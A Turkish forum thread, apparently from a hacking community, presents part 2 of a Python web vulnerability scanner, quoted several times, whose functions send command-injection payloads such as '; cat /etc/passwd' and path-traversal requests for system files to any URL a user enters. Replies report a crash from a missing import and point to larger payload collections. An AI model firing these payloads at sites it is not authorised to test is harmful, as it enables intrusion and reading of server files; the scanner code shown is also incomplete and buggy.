Python İle Vulnerability Scanner / SQL Injection, XSS, CSRF ve Daha Fazlası! / 2. Bölüm

[Reksy]

Buda 2. Bölümdür


7. Komut Enjeksiyonu Testi​

def test_command_injection(url):
    payloads = [
        "; ls", "&& ls", "| ls", "`ls`",
        "; whoami", "&& whoami", "| whoami", "`whoami`",
        "; cat /etc/passwd", "&& cat /etc/passwd"
    ]
    for payload in payloads:
        new_url = f"{url}?cmd={payload}"
        try:
            response = requests.get(new_url)
            if any(keyword in response.text for keyword in ["bin", "usr", "root", "cat", "whoami"]):
                print(f"Olası Komut Enjeksiyonu zafiyeti tespit edildi: {new_url}")
                return True
        except requests.RequestException as e:
            print(f"Komut Enjeksiyonu testinde bir hata oluştu: {e}")
    return False

Bu fonksiyon, komut enjeksiyonu zafiyetlerini test eder. URL'ye çeşitli komutları ekler ve yanıt metninde belirli anahtar kelimeleri arar. Eğer bu anahtar kelimeler bulunursa, komut enjeksiyonu zafiyeti tespit edilir.
ㅤ

8. Directory Traversal Testi​

def test_directory_traversal(url):
    payloads = [
        "../../../../etc/passwd", "../../../../windows/win.ini",
        "/etc/passwd", "/windows/win.ini",
        "/etc/hosts", "../../../../var/log/syslog"
    ]
    for payload in payloads:
        new_url = f"{url}/{payload}"
        try:
            response = requests.get(new_url)
            if "root:" in response.text or "[fonts]" in response.text or "127.0.0.1" in response.text:
                print(f"Olası Dizin Gezinme zafiyeti tespit edildi: {new_url}")
                return True
        except requests.RequestException as e:
            print(f"Dizin Gezinme testinde bir hata oluştu: {e}")
    return False

Bu fonksiyon, dizin gezintisi zafiyetlerini test eder. Çeşitli dosya yollarını URL'ye ekler ve yanıt metninde bu dosya içeriklerini arar. Eğer bu içerikler bulunursa, dizin gezintisi zafiyeti tespit edilir.
ㅤ

9. IDOR (Insecure Direct Object References) Testi​

def test_idor(url):
    try:
        for i in range(1, 10):
            response = requests.get(f"{url}/profile?id={i}")
            if f"user{i}" in response.text:
                print(f"Olası IDOR zafiyeti tespit edildi: {url}/profile?id={i}")
                return True
    except requests.RequestException as e:
        print(f"IDOR testinde bir hata oluştu: {e}")
    return False

Bu fonksiyon, IDOR zafiyetlerini test eder. Belirli bir aralıkta ID değerlerini URL'ye ekler ve yanıt metninde ilgili kullanıcı bilgilerini arar. Eğer bu bilgiler bulunursa, IDOR zafiyeti tespit edilir.
ㅤ

10. Güvenlik Başlıkları Testi​

def test_security_headers(url):
    headers_to_check = [
        "Strict-Transport-Security", "Content-Security-Policy",
        "X-Content-Type-Options", "X-Frame-Options",
        "X-XSS-Protection", "Referrer-Policy"
    ]
    try:
        response = requests.get(url)
        headers = response.headers
        missing_headers = [header for header in headers_to_check if header not in headers]
        if missing_headers:
            print(f"Yetersiz güvenlik başlıkları tespit edildi: {missing_headers}")
            return True
    except requests.RequestException as e:
        print(f"Güvenlik başlıkları testinde bir hata oluştu: {e}")
    return False

Bu fonksiyon, güvenlik başlıklarını test eder. Belirli başlıkların yanıt başlıklarında olup olmadığını kontrol eder. Eğer eksik başlıklar varsa, bu güvenlik zafiyeti olarak kabul edilir.
ㅤ

11. Ana Fonksiyon​

def vulnerability_scanner(url):
    print("Reksy Tarafından Yapıldı")
    if test_sql_injection(url):
        print(f"{url} üzerinde SQL Injection zafiyeti tespit edildi.")
    else:
        print(f"{url} üzerinde SQL Injection zafiyeti tespit edilmedi.")
   
    if test_xss(url):
        print(f"{url} üzerinde XSS zafiyeti tespit edildi.")
    else:
        print(f"{url} üzerinde XSS zafiyeti tespit edilmedi.")

    if test_csrf(url):
        print(f"{url} üzerinde CSRF zafiyeti tespit edildi.")
    else:
        print(f"{url} üzerinde CSRF zafiyeti tespit edilmedi.")

    if test_file_inclusion(url):
        print(f"{url} üzerinde Dosya Dahil Etme zafiyeti tespit edildi.")
    else:
        print(f"{url} üzerinde Dosya Dahil Etme zafiyeti tespit edilmedi.")

    if test_command_injection(url):
        print(f"{url} üzerinde Komut Enjeksiyonu zafiyeti tespit edildi.")
    else:
        print(f"{url} üzerinde Komut Enjeksiyonu zafiyeti tespit edilmedi.")

    if test_directory_traversal(url):
        print(f"{url} üzerinde Dizin Gezinme zafiyeti tespit edildi.")
    else:
        print(f"{url} üzerinde Dizin Gezinme zafiyeti tespit edilmedi.")

    if test_idor(url):
        print(f"{url} üzerinde IDOR zafiyeti tespit edildi.")
    else:
        print(f"{url} üzerinde IDOR zafiyeti tespit edilmedi.")


target_url = input("Lütfen taramak istediğiniz URL'yi girin: ")
vulnerability_scanner(target_url)

Bu bölüm, yukarıda tanımlanan tüm test fonksiyonlarını çağırır ve her bir zafiyet türü için test sonuçlarını kullanıcıya bildirir. Kullanıcıdan bir URL alır ve bu URL üzerinde testler yapar.

Sonuç​

Bu kod, web uygulamalarında yaygın olarak karşılaşılan güvenlik açıklarını test etmek için kapsamlı bir araç sağlar. SQL Injection, XSS, CSRF, Dosya Dahil Etme, Komut Enjeksiyonu, Dizin Gezinme ve IDOR gibi zafiyetleri tespit etmeye çalışır. Her bir zafiyet türü için çeşitli payloadlar kullanarak, güvenlik açıklarının varlığını belirler ve kullanıcıya bildirir. Bu tür testler, web uygulamalarının güvenliğini sağlamak ve potansiyel saldırılardan korumak için kritik öneme sahiptir.



Ve geldik Dosyanın Tam Haline Github Linki İle Bırakıyorum
Link: GitHub - ReksySec/Vulnerability-Scanner.py: By Reksy :)

 

[Ogehan]

Emeğine sağlık

 

[Reksy]

Emeğine sağlık

Hocam İlkkez Böyle Bişey Yapmaya Çalıştım Hatalarımı Gösterebilirseniz Çok İyi Olur Değerli Yorumunuz İçinde Teşekkür Ederim

 

[Ogehan]

Hocam İlkkez Böyle Bişey Yapmaya Çalıştım Hatalarımı Gösterebilirseniz Çok İyi Olur Değerli Yorumunuz İçinde Teşekkür Ederim

Şuan deneme şansım yok sabaha doğru detaylı inceleyeceğim eline sağlık tekrardan

 

[narkotix7]

Buda 2. Bölümdür​

​

​

7. Komut Enjeksiyonu Testi​

def test_command_injection(url):
    payloads = [
        "; ls", "&& ls", "| ls", "`ls`",
        "; whoami", "&& whoami", "| whoami", "`whoami`",
        "; cat /etc/passwd", "&& cat /etc/passwd"
    ]
    for payload in payloads:
        new_url = f"{url}?cmd={payload}"
        try:
            response = requests.get(new_url)
            if any(keyword in response.text for keyword in ["bin", "usr", "root", "cat", "whoami"]):
                print(f"Olası Komut Enjeksiyonu zafiyeti tespit edildi: {new_url}")
                return True
        except requests.RequestException as e:
            print(f"Komut Enjeksiyonu testinde bir hata oluştu: {e}")
    return False

Bu fonksiyon, komut enjeksiyonu zafiyetlerini test eder. URL'ye çeşitli komutları ekler ve yanıt metninde belirli anahtar kelimeleri arar. Eğer bu anahtar kelimeler bulunursa, komut enjeksiyonu zafiyeti tespit edilir.
ㅤ

8. Directory Traversal Testi​

def test_directory_traversal(url):
    payloads = [
        "../../../../etc/passwd", "../../../../windows/win.ini",
        "/etc/passwd", "/windows/win.ini",
        "/etc/hosts", "../../../../var/log/syslog"
    ]
    for payload in payloads:
        new_url = f"{url}/{payload}"
        try:
            response = requests.get(new_url)
            if "root:" in response.text or "[fonts]" in response.text or "127.0.0.1" in response.text:
                print(f"Olası Dizin Gezinme zafiyeti tespit edildi: {new_url}")
                return True
        except requests.RequestException as e:
            print(f"Dizin Gezinme testinde bir hata oluştu: {e}")
    return False

Bu fonksiyon, dizin gezintisi zafiyetlerini test eder. Çeşitli dosya yollarını URL'ye ekler ve yanıt metninde bu dosya içeriklerini arar. Eğer bu içerikler bulunursa, dizin gezintisi zafiyeti tespit edilir.
ㅤ

9. IDOR (Insecure Direct Object References) Testi​

def test_idor(url):
    try:
        for i in range(1, 10):
            response = requests.get(f"{url}/profile?id={i}")
            if f"user{i}" in response.text:
                print(f"Olası IDOR zafiyeti tespit edildi: {url}/profile?id={i}")
                return True
    except requests.RequestException as e:
        print(f"IDOR testinde bir hata oluştu: {e}")
    return False

Bu fonksiyon, IDOR zafiyetlerini test eder. Belirli bir aralıkta ID değerlerini URL'ye ekler ve yanıt metninde ilgili kullanıcı bilgilerini arar. Eğer bu bilgiler bulunursa, IDOR zafiyeti tespit edilir.
ㅤ

10. Güvenlik Başlıkları Testi​

def test_security_headers(url):
    headers_to_check = [
        "Strict-Transport-Security", "Content-Security-Policy",
        "X-Content-Type-Options", "X-Frame-Options",
        "X-XSS-Protection", "Referrer-Policy"
    ]
    try:
        response = requests.get(url)
        headers = response.headers
        missing_headers = [header for header in headers_to_check if header not in headers]
        if missing_headers:
            print(f"Yetersiz güvenlik başlıkları tespit edildi: {missing_headers}")
            return True
    except requests.RequestException as e:
        print(f"Güvenlik başlıkları testinde bir hata oluştu: {e}")
    return False

Bu fonksiyon, güvenlik başlıklarını test eder. Belirli başlıkların yanıt başlıklarında olup olmadığını kontrol eder. Eğer eksik başlıklar varsa, bu güvenlik zafiyeti olarak kabul edilir.
ㅤ

11. Ana Fonksiyon​

def vulnerability_scanner(url):
    print("Reksy Tarafından Yapıldı")
    if test_sql_injection(url):
        print(f"{url} üzerinde SQL Injection zafiyeti tespit edildi.")
    else:
        print(f"{url} üzerinde SQL Injection zafiyeti tespit edilmedi.")
  
    if test_xss(url):
        print(f"{url} üzerinde XSS zafiyeti tespit edildi.")
    else:
        print(f"{url} üzerinde XSS zafiyeti tespit edilmedi.")

    if test_csrf(url):
        print(f"{url} üzerinde CSRF zafiyeti tespit edildi.")
    else:
        print(f"{url} üzerinde CSRF zafiyeti tespit edilmedi.")

    if test_file_inclusion(url):
        print(f"{url} üzerinde Dosya Dahil Etme zafiyeti tespit edildi.")
    else:
        print(f"{url} üzerinde Dosya Dahil Etme zafiyeti tespit edilmedi.")

    if test_command_injection(url):
        print(f"{url} üzerinde Komut Enjeksiyonu zafiyeti tespit edildi.")
    else:
        print(f"{url} üzerinde Komut Enjeksiyonu zafiyeti tespit edilmedi.")

    if test_directory_traversal(url):
        print(f"{url} üzerinde Dizin Gezinme zafiyeti tespit edildi.")
    else:
        print(f"{url} üzerinde Dizin Gezinme zafiyeti tespit edilmedi.")

    if test_idor(url):
        print(f"{url} üzerinde IDOR zafiyeti tespit edildi.")
    else:
        print(f"{url} üzerinde IDOR zafiyeti tespit edilmedi.")


target_url = input("Lütfen taramak istediğiniz URL'yi girin: ")
vulnerability_scanner(target_url)

Bu bölüm, yukarıda tanımlanan tüm test fonksiyonlarını çağırır ve her bir zafiyet türü için test sonuçlarını kullanıcıya bildirir. Kullanıcıdan bir URL alır ve bu URL üzerinde testler yapar.

Sonuç​

Bu kod, web uygulamalarında yaygın olarak karşılaşılan güvenlik açıklarını test etmek için kapsamlı bir araç sağlar. SQL Injection, XSS, CSRF, Dosya Dahil Etme, Komut Enjeksiyonu, Dizin Gezinme ve IDOR gibi zafiyetleri tespit etmeye çalışır. Her bir zafiyet türü için çeşitli payloadlar kullanarak, güvenlik açıklarının varlığını belirler ve kullanıcıya bildirir. Bu tür testler, web uygulamalarının güvenliğini sağlamak ve potansiyel saldırılardan korumak için kritik öneme sahiptir.



Ve geldik Dosyanın Tam Haline Github Linki İle Bırakıyorum
Link: GitHub - ReksySec/Vulnerability-Scanner.py: By Reksy :)

Eline sağlık

 

[Reksy]

Eline sağlık

Çok Sağolun Hatalarım Varsa Affola

 

[TermV2]

Elinize Emeğinize Sağlık hocam ama bir sorun oluştu hata verdi kod.

██▀███ ▓█████ ██ ▄█▀ ██████ ▓██ ██▓
▓██ ▒ ██▒▓█ ▀ ██▄█▒ ▒██ ▒ ▒██ ██▒
▓██ ░▄█ ▒▒███ ▓███▄░ ░ ▓██▄ ▒██ ██░
▒██▀▀█▄ ▒▓█ ▄ ▓██ █▄ ▒ ██▒ ░ ▐██▓░
░██▓ ▒██▒░▒████▒▒██▒ █▄▒██████▒▒ ░ ██▒▓░
░ ▒▓ ░▒▓░░░ ▒░ ░▒ ▒▒ ▓▒▒ ▒▓▒ ▒ ░ ██▒▒▒
░▒ ░ ▒░ ░ ░ ░░ ░▒ ▒░░ ░▒ ░ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ░ ░ ░ ░ ▒ ▒ ░░
░ ░ ░░ ░ ░ ░ ░
░ ░
Telegram Reksy Vulnerability Scanner

Lütfen taramak istediğiniz URL'yi girin: Example Domain
Reksy Tarafından Yapıldı
Traceback (most recent call last):
File "/data/user/0/ru.iiec.pydroid3/files/accomp_files/iiec_run/iiec_run.py", line 31, in <module>
start(fakepyfile,mainpyfile)
File "/data/user/0/ru.iiec.pydroid3/files/accomp_files/iiec_run/iiec_run.py", line 30, in start
exec(open(mainpyfile).read(), __main__.__dict__)
File "<string>", line 215, in <module>
File "<string>", line 178, in vulnerability_scanner
File "<string>", line 34, in test_sql_injection
NameError: name 're' is not defined

[Program finished]

 

[Feqtico]

Eline sağlık, payloadları çok geliştirmen lazım bu payloadlar güncel sitelerde iş yapmaz.

 

[kızılırmak']

Elinize emeğinize sağlık hocam

 

[Reksy]

Eline sağlık, payloadları çok geliştirmen lazım bu payloadlar güncel sitelerde iş yapmaz.

Hocam Açık Kaynak Kodu Bıraktım direk işine yarayan kendine göre ayar çekip kullanabilsin diye

Elinize emeğinize sağlık hocam

Çok Teşekkür Ederim .

Elinize Emeğinize Sağlık hocam ama bir sorun oluştu hata verdi kod.


[Program finished]

Hocam Hemen Bakıyorum

Eline sağlık, payloadları çok geliştirmen lazım bu payloadlar güncel sitelerde iş yapmaz.

Bİde Hocam Gelişmiş Payloadları Nerden Bulurum V2 Misali Bişey Yapmak İstiyorum

 

[Feqtico]

Bİde Hocam Gelişmiş Payloadları Nerden Bulurum V2 Misali Bişey Yapmak İstiyorum

GitHub - swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTF

A list of useful payloads and bypass for Web Application Security and Pentest/CTF - swisskyrepo/PayloadsAllTheThings

github.com

 

[Reksy]

GitHub - swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTF

A list of useful payloads and bypass for Web Application Security and Pentest/CTF - swisskyrepo/PayloadsAllTheThings

github.com

Çok Sağolun Hocam

 

[sametghack]

Eline saglik

 

[Reksy]

Eline saglik

sağolun hocam

 

[rootkawun]

Buda 2. Bölümdür​

​

​

7. Komut Enjeksiyonu Testi​

def test_command_injection(url):
    payloads = [
        "; ls", "&& ls", "| ls", "`ls`",
        "; whoami", "&& whoami", "| whoami", "`whoami`",
        "; cat /etc/passwd", "&& cat /etc/passwd"
    ]
    for payload in payloads:
        new_url = f"{url}?cmd={payload}"
        try:
            response = requests.get(new_url)
            if any(keyword in response.text for keyword in ["bin", "usr", "root", "cat", "whoami"]):
                print(f"Olası Komut Enjeksiyonu zafiyeti tespit edildi: {new_url}")
                return True
        except requests.RequestException as e:
            print(f"Komut Enjeksiyonu testinde bir hata oluştu: {e}")
    return False

Bu fonksiyon, komut enjeksiyonu zafiyetlerini test eder. URL'ye çeşitli komutları ekler ve yanıt metninde belirli anahtar kelimeleri arar. Eğer bu anahtar kelimeler bulunursa, komut enjeksiyonu zafiyeti tespit edilir.
ㅤ

8. Directory Traversal Testi​

def test_directory_traversal(url):
    payloads = [
        "../../../../etc/passwd", "../../../../windows/win.ini",
        "/etc/passwd", "/windows/win.ini",
        "/etc/hosts", "../../../../var/log/syslog"
    ]
    for payload in payloads:
        new_url = f"{url}/{payload}"
        try:
            response = requests.get(new_url)
            if "root:" in response.text or "[fonts]" in response.text or "127.0.0.1" in response.text:
                print(f"Olası Dizin Gezinme zafiyeti tespit edildi: {new_url}")
                return True
        except requests.RequestException as e:
            print(f"Dizin Gezinme testinde bir hata oluştu: {e}")
    return False

Bu fonksiyon, dizin gezintisi zafiyetlerini test eder. Çeşitli dosya yollarını URL'ye ekler ve yanıt metninde bu dosya içeriklerini arar. Eğer bu içerikler bulunursa, dizin gezintisi zafiyeti tespit edilir.
ㅤ

9. IDOR (Insecure Direct Object References) Testi​

def test_idor(url):
    try:
        for i in range(1, 10):
            response = requests.get(f"{url}/profile?id={i}")
            if f"user{i}" in response.text:
                print(f"Olası IDOR zafiyeti tespit edildi: {url}/profile?id={i}")
                return True
    except requests.RequestException as e:
        print(f"IDOR testinde bir hata oluştu: {e}")
    return False

Bu fonksiyon, IDOR zafiyetlerini test eder. Belirli bir aralıkta ID değerlerini URL'ye ekler ve yanıt metninde ilgili kullanıcı bilgilerini arar. Eğer bu bilgiler bulunursa, IDOR zafiyeti tespit edilir.
ㅤ

10. Güvenlik Başlıkları Testi​

def test_security_headers(url):
    headers_to_check = [
        "Strict-Transport-Security", "Content-Security-Policy",
        "X-Content-Type-Options", "X-Frame-Options",
        "X-XSS-Protection", "Referrer-Policy"
    ]
    try:
        response = requests.get(url)
        headers = response.headers
        missing_headers = [header for header in headers_to_check if header not in headers]
        if missing_headers:
            print(f"Yetersiz güvenlik başlıkları tespit edildi: {missing_headers}")
            return True
    except requests.RequestException as e:
        print(f"Güvenlik başlıkları testinde bir hata oluştu: {e}")
    return False

Bu fonksiyon, güvenlik başlıklarını test eder. Belirli başlıkların yanıt başlıklarında olup olmadığını kontrol eder. Eğer eksik başlıklar varsa, bu güvenlik zafiyeti olarak kabul edilir.
ㅤ

11. Ana Fonksiyon​

def vulnerability_scanner(url):
    print("Reksy Tarafından Yapıldı")
    if test_sql_injection(url):
        print(f"{url} üzerinde SQL Injection zafiyeti tespit edildi.")
    else:
        print(f"{url} üzerinde SQL Injection zafiyeti tespit edilmedi.")
  
    if test_xss(url):
        print(f"{url} üzerinde XSS zafiyeti tespit edildi.")
    else:
        print(f"{url} üzerinde XSS zafiyeti tespit edilmedi.")

    if test_csrf(url):
        print(f"{url} üzerinde CSRF zafiyeti tespit edildi.")
    else:
        print(f"{url} üzerinde CSRF zafiyeti tespit edilmedi.")

    if test_file_inclusion(url):
        print(f"{url} üzerinde Dosya Dahil Etme zafiyeti tespit edildi.")
    else:
        print(f"{url} üzerinde Dosya Dahil Etme zafiyeti tespit edilmedi.")

    if test_command_injection(url):
        print(f"{url} üzerinde Komut Enjeksiyonu zafiyeti tespit edildi.")
    else:
        print(f"{url} üzerinde Komut Enjeksiyonu zafiyeti tespit edilmedi.")

    if test_directory_traversal(url):
        print(f"{url} üzerinde Dizin Gezinme zafiyeti tespit edildi.")
    else:
        print(f"{url} üzerinde Dizin Gezinme zafiyeti tespit edilmedi.")

    if test_idor(url):
        print(f"{url} üzerinde IDOR zafiyeti tespit edildi.")
    else:
        print(f"{url} üzerinde IDOR zafiyeti tespit edilmedi.")


target_url = input("Lütfen taramak istediğiniz URL'yi girin: ")
vulnerability_scanner(target_url)

Bu bölüm, yukarıda tanımlanan tüm test fonksiyonlarını çağırır ve her bir zafiyet türü için test sonuçlarını kullanıcıya bildirir. Kullanıcıdan bir URL alır ve bu URL üzerinde testler yapar.

Sonuç​

Bu kod, web uygulamalarında yaygın olarak karşılaşılan güvenlik açıklarını test etmek için kapsamlı bir araç sağlar. SQL Injection, XSS, CSRF, Dosya Dahil Etme, Komut Enjeksiyonu, Dizin Gezinme ve IDOR gibi zafiyetleri tespit etmeye çalışır. Her bir zafiyet türü için çeşitli payloadlar kullanarak, güvenlik açıklarının varlığını belirler ve kullanıcıya bildirir. Bu tür testler, web uygulamalarının güvenliğini sağlamak ve potansiyel saldırılardan korumak için kritik öneme sahiptir.



Ve geldik Dosyanın Tam Haline Github Linki İle Bırakıyorum
Link: GitHub - ReksySec/Vulnerability-Scanner.py: By Reksy :)

+++++

 

[Reksy]

+++++

Bu Ne Demek Hocam

 

[rootkawun]

Bu Ne Demek Hocam

Ellerine sağlık muq olmuş demek

 

[Reksy]

Ellerine sağlık muq olmuş demek

he teşekkür ederim hocam

 

[TermV2]

Bİde Hocam Gelişmiş Payloadları Nerden Bulurum V2 Misali Bişey Yapmak İstiyorum

Hocam cveleri bakınız belki bulursunuz

 

[Reksy]

Hocam cveleri bakınız belki bulursunuz

Kaynağı verdi bir arkadaş onunla beraber Daha iyi hale getiricem kodu daha detaylı tarama yapıcak hocam beklemede kalın